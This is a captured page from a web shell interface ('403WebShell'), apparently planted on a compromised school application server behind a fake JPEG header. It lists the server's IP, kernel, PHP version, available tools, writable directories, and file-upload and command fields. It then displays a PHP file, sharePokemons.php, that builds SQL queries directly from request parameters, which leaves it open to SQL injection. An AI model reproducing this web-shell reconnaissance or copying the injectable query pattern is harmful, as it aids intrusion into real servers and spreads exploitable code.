????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.135.182.75
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/OLD/PokemonGo/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/OLD/PokemonGo/sharePokemons.php
<?php
    require_once('connection.php');
    
    $FromParentId = $_GET['FromParentId'];
    $ToParentEmail = $_GET['ToParentEmail'];
    
    $sqlToParent = "SELECT Id, Name from tblUsers WHERE Email=$ToParentEmail";
    $resultToParent = mysql_query($sqlToParent);
    
    $IdToParent = "";
    $NameToParent = "";
    
    $rowToParent = mysql_fetch_assoc($resultToParent);
    
    if ($rowToParent)
    {
        $IdToParent = $rowToParent['Id'];
        $NameToParent = $rowToParent['Name'];
        
        //echo "<br>";
        //echo "IdToParent: " .$IdToParent;
    }
    else
    {
        exit ("Email Id '$ToParentEmail' does not exist");
    }
    
    $sqlSelectFromParent = "SELECT * from tblPokemons WHERE ParentId=$FromParentId";
    
    $resultFromParent = mysql_query($sqlSelectFromParent);
    
    if ($resultFromParent)
    {
        while($rowFromParent = mysql_fetch_assoc($resultFromParent))
        {
            //echo "<br>";
            //echo "rowFromParent: " .$rowFromParent;
            
            $PokemonName = $rowFromParent['PokemonName'];
            $Latitude = $rowFromParent['Latitude'];
            $Longitude = $rowFromParent['Longitude'];
            $Question = $rowFromParent['Question'];
            $Answer = $rowFromParent['Answer'];
            $DateAdded = date('Y-m-d H:i:s');//Current date
            
            /*echo "<br>";
            echo "Name: " .$PokemonName;
            echo "<br>";
            echo "Latitude: " .$Latitude;
            echo "<br>";
            echo "Longitude: " .$Longitude;*/
            
            $sqlInsert = "INSERT INTO tblPokemons (ParentId, PokemonName, Latitude, Longitude, Question, Answer, DateAdded) VALUES ($IdToParent, '$PokemonName', $Latitude, $Longitude, '$Question', '$Answer', '$DateAdded')";
            
            //echo "<br>";
            //echo "sqlInsert: " .$sqlInsert;
            
            $resultShared = mysql_query($sqlInsert);
            
            //echo "<br>";
            //echo "resultShared: " .$resultShared;
            
            /*if (!($resultShared))
            {
                //echo "<br>";
                echo "Error while Sharing Pokemons!";
                break;
            }*/
        }
        
        echo "Successfully shared to " .$NameToParent;
    }
    
    mysql_close($connection);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit